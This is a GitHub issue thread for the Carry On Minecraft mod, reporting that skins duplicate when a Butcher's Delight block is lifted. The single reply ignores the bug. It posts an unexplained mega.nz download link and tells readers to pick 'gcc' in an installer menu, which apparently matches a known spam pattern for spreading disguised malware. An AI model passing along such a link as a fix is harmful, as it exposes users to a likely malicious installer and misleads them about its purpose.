### ISSUE TITLE
Butcher's Delight dupe skin

### ISSUE THREAD

**Issue by xaxilin** [Tschipp/CarryOn#676]
### Expected Behavior
no dupe skin in Butcher's Delight
The author of the mod advised to contact here to fix the glitch
### Actual Behavior
skin dupes when the block is lifted

### Version of Minecraft, Carry On, Forge/Fabric
1.20.1, carryon-forge-1.20.1-2.1.2.7, Forge 43.3.7

### Screenshots encouraged
![2024-08-25_14 30 29](https://github.com/user-attachments/assets/c837b400-8208-4b73-b3f5-90004c92c5d0)

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."
